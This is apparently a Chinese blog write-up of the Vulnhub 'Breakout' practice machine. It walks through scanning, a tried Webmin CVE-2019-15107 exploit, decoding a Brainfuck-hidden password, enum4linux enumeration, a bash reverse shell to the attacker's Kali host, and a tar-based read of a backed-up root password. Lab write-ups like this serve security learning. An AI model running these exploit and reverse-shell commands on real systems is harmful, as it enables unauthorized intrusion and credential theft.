【Vulnhub靶场】Breakout

目录

前言

一、信息收集

0x00 arp-scan扫描

0x01 nmap扫描

0x02 dirsearch扫描

二、漏洞利用

0x01 webmin 远程代码漏洞

0x02 Brainfuck

0x03 enum4linux

0x04 反弹shell

0x05 搜集信息

三、提权

0x00 tar利用

 总结


前言

Difficulty: Easy

This box was created to be an Easy box, but it can be Medium if you get lost.

 难度:简单
这个盒子被创建为一个简单的盒子,但如果你迷路了,它可以是中等的。

下载链接

https://download.vulnhub.com/empire/02-Breakout.zip.torrent

环境介绍

kali   192.168.56.102

靶机 :192.168.56.101

一、信息收集

0x00 arp-scan扫描

这个是101,因为开关靶机地址刷新了,没有对截图做变更

arp-scan -I eth1 -l 

0x01 nmap扫描

 

https://192.168.56.101:10000
https://192.168.56.101:20000
二者页面一致

 正常页面

0x02 dirsearch扫描

 

二、漏洞利用

0x01 webmin 远程代码漏洞

https://github.com/jas502n/CVE-2019-15107
​
python CVE_2019_15107.py https://192.168.56.101:10000/ "ls"   

未发现webmin

0x02 Brainfuck

源码内有Brainfuck 密文

解密:http://www.hiencode.com/brain.html

.2uqPEfj3D<P'a-3

0x03 enum4linux

“enum4linux是Kali Linux自带的一款信息收集工具。它可以收集Windows系统的大量信息,如用户名列表、主机列表、共享列表、密码策略信息、工作组和成员信息、主机信息、打印机信息等等
enum4linux -a ip    #做所有简单枚举(-U -S -G -P -r -o -n -i),如果您没有提供任何其他选项,则启用此选项
enum4linux -l ip    #通过LDAP 389 / TCP获取一些(有限的)信息(仅适用于DN)
enum4linux -o ip    #获取操作系统信息
enum4linux -r ip    #通过RID循环枚举用户

用户 cyber
​
密码  .2uqPEfj3D<P'a-3

在10000端口登录失败

在20000端口登录成功

利用终端执行命令

0x04 反弹shell

bash -i >& /dev/tcp/192.168.56.102/9001 0>&1

0x05 搜集信息

在/var/backups目录发现old_pass

三、提权

0x00 tar利用

发现tar可执行

利用tar压缩解压该文件获取权限

权限发生改变

查看old_pass的内容,应该为root的密码

Ts&4&YurgtRX(=~h

提权成功

 总结

1、学习到enum4linux的用法。

2、webmin远程代码漏洞【CVE_2019_15107】利用

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ch33syNai1a0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值